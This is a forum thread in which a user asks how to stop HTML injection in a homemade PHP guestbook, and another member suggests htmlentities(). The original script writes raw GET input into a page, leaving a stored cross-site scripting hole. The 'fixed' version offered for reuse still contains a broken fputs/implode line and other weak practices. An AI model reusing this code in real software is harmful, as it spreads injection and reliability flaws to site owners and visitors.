SitePoint Sponsor

User Tag List

Results 1 to 4 of 4

Thread: disable HTML??

  1. #1
    Keep Moving Forward gold trophysilver trophybronze trophy
    Shaun(OfTheDead)'s Avatar
    Join Date
    Nov 2005
    Location
    Trinidad
    Posts
    3,727
    Mentioned
    43 Post(s)
    Tagged
    0 Thread(s)

    disable HTML??

    Hi there...

    I've gone through a tonne of these threads and havn't found what I'm looking for (although I'm sure this is a common question)...

    I have a guestbook on my site that consists on a form textarea and an inline frame which displays a file called 'comments.html' (which I guess is self-explanitory).

    When the user types stuff into the textarea and submits, a php page is called into the iframe which gets the stuff they typed, "appends" (for lack of a better word) it to the top of the 'comments.html' file, then re-opens the 'comments.html' into the iframe.

    (I hope I didn't make that sound too confusing)

    Anyway... It works fine, but it's a huge security risk because anyone (who knows what they're doing) can enter any HTML into the textarea, and it will go ahead and be rendered onto the page.

    So... is there a way to disable an HTML comment, while the PHP file is being parsed??

    Here is the PHP file (well... a simplified version)...


    <html>
    <head>
    <title>My Guestbook</title>
    <link rel="stylesheet" type="text/css" href="MyStyles.css" />
    </head>

    <body style="background-color:#ffffff">
    <?php
    $user=$_GET["username"];
    $user=stripslashes($user);
    $message=$_GET["message"];
    $message=stripslashes($message);
    print("<p class='txt'>Thank you!! Your comments have been added...<br />&nbsp;<a class='txt' href=GuestbookContent.html>View your message</a>.</p>");

    $in=fopen("GuestbookContent.html","rb");
    $contents = fread($in, filesize("GuestbookContent.html"));
    fclose($in);

    $out=fopen("GuestbookContent.html","w");
    if(!$out){
    print("Could not load database :s");
    exit;
    }

    fputs($out,implode,("\n"));
    fwrite($out,"\n<hr><p><b>$user</b> (");
    fwrite($out,date('d/m/Y'));
    fwrite($out,")");
    fwrite($out,"<br>$message</p>");
    fwrite($out,"$contents");
    fclose($out);
    ?>
    </body>
    </html>

    Thanks!!

  2. #2
    SitePoint Evangelist Rodney H.'s Avatar
    Join Date
    Sep 2005
    Location
    Chicago, IL
    Posts
    479
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You can use htmlentities() or strip_tags() in this situation to do what you need.

  3. #3
    Keep Moving Forward gold trophysilver trophybronze trophy
    Shaun(OfTheDead)'s Avatar
    Join Date
    Nov 2005
    Location
    Trinidad
    Posts
    3,727
    Mentioned
    43 Post(s)
    Tagged
    0 Thread(s)
    Jeeezus Christ!!... I leave this forum for 3 days and already I can't find my post!!...

    Anyways... The "htmlentities()" did the trick. Thanks a lot dude!!...
    Quite frankly whenever I check the manual for anything I get a nosebleed from the sheer confusion.

    The final product looks like this... (in case anyone wants to use my primitive guestbook)


    <html>
    <head>
    <title>My Guestbook</title>
    <link rel="stylesheet" type="text/css" href="MyStyles.css" />
    </head>

    <body style="background-color:#ffffff">
    <?php
    $user=$_GET["username"];
    $user=stripslashes($user);
    $user=htmlentities($user);
    $message=$_GET["message"];
    $message=stripslashes($message);
    $message=htmlentities($message);
    print("<p class='txt'>Thank you!! Your comments have been added...<br />&nbsp;<a class='txt' href=GuestbookContent.html>View your message</a>.</p>");

    $in=fopen("GuestbookContent.html","rb");
    $contents = fread($in, filesize("GuestbookContent.html"));
    fclose($in);

    $out=fopen("GuestbookContent.html","w");
    if(!$out){
    print("Could not load database :s");
    exit;
    }

    fputs($out,implode,("\n"));
    fwrite($out,"\n<hr><p><b>$user</b> (");
    fwrite($out,date('d/m/Y'));
    fwrite($out,")");
    fwrite($out,"<br>$message</p>");
    fwrite($out,"$contents");
    fclose($out);
    ?>
    </body>
    </html>

    Thanks again, dude

  4. #4
    SitePoint Evangelist Rodney H.'s Avatar
    Join Date
    Sep 2005
    Location
    Chicago, IL
    Posts
    479
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Shaun(OfTheDead)
    Quite frankly whenever I check the manual for anything I get a nosebleed from the sheer confusion.
    It is definitely an acquired taste, I will grant you that, Shaun...


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •